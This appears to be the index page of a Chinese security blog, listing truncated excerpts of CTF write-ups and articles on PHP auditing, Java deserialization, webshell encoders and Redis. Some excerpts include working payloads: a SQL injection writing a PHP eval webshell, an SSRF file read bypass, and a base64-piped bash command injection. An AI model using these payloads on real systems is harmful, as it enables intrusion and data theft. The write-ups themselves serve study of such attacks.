签到 略过~ write_shell 代码审计: ```php <?php error_reporting(0); highlight_file(FILE); function check($input){ if(preg_match("/'| ||php|;|~|\^|\+|eval|{|}/i",$input)){ // if(preg_match("/'|...
签到 略过~ write_shell 代码审计: ```php <?php error_reporting(...
阅读全文>>最近想起来学习java,看了下p神的java漫谈(十二),于是也跟着审了一下yso!cc6的链。 Gadget chain yso中提供的gadget chain为: Gadget chain: java.io.ObjectInputStream.readObject() java.util.HashSet.readObject() ...
最近想起来学习java,看了下p神的java漫谈(十二),于是也跟着审了一下yso!cc6的链。 Gadget c...
阅读全文>>NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文件,根据http://www.crystalradio.cn/thread-637028-1-1.html来反编译。 ```c _BYTE sub_8000314() { _BYTE v0; // r4 unsigned __int8 *v1; // r5 int v...
NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文...
阅读全文>>文章首发于:i春秋 容错特性 我先甩出关于容错特性的一个概述:(php的容错特性)当有一个不存在的协议,即无法被成功解析,如hhhm://,将其放入file_get_contents中,会发现其报错,而究其所以是将这个自定义的协议置为null,而php中当协议为null或者file时会进行本地文件读取,也就是说我们可以当做进行本地文件的操作。 本地放一段代码: php <?php in...
文章首发于:i春秋 容错特性 我先甩出关于容错特性的一个概述:(php的容错特性)当有一个不存在的协议,即无法被成...
阅读全文>>easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...
easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...
阅读全文>>文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行代码 or 发现了一个phpinfo页面之后,会从该页面中搜集一些可用信息以便后续漏洞的寻找。 我谈谈我个人的几个偏向点: 版本号 最直观的就是php版本号(虽然版本号有时候会在响应头中出现),如我的机器上版本号为: PHP Version 7.2.9-1 那么找到版本号后就会综...
文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行...
阅读全文>>虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...
虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...
阅读全文>>ps:水文一篇,权当个人备忘 编码器常见于特殊webshell,如我们往webshell中压多一句base64用以绕过某些waf,那么蚁剑中自带了一些编码器,但在需要如多层base64时内置的编码器往往就不够用了。 base64 一个最简单的base64编码器编写如下: ```js /* * php::base64编码器 * Create at: 2020/11/21 15:21:10 ...
ps:水文一篇,权当个人备忘 编码器常见于特殊webshell,如我们往webshell中压多一句base64用以...
阅读全文>>Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...
Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...
阅读全文>>文章首发于:i春秋 简述 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。这使得Redis可执行单层树复制。存盘可以...
文章首发于:i春秋 简述 Redis(Remote Dictionary Server ),即远程字典服务,是一...
阅读全文>>
_ _ _ _ ___ ___
| | | | | | | | \/ |
| |_| | |__ | |__ | . . |
| _ | '_ \| '_ \| |\/| |
| | | | | | | | | | | | |
\_| |_/_| |_|_| |_\_| |_/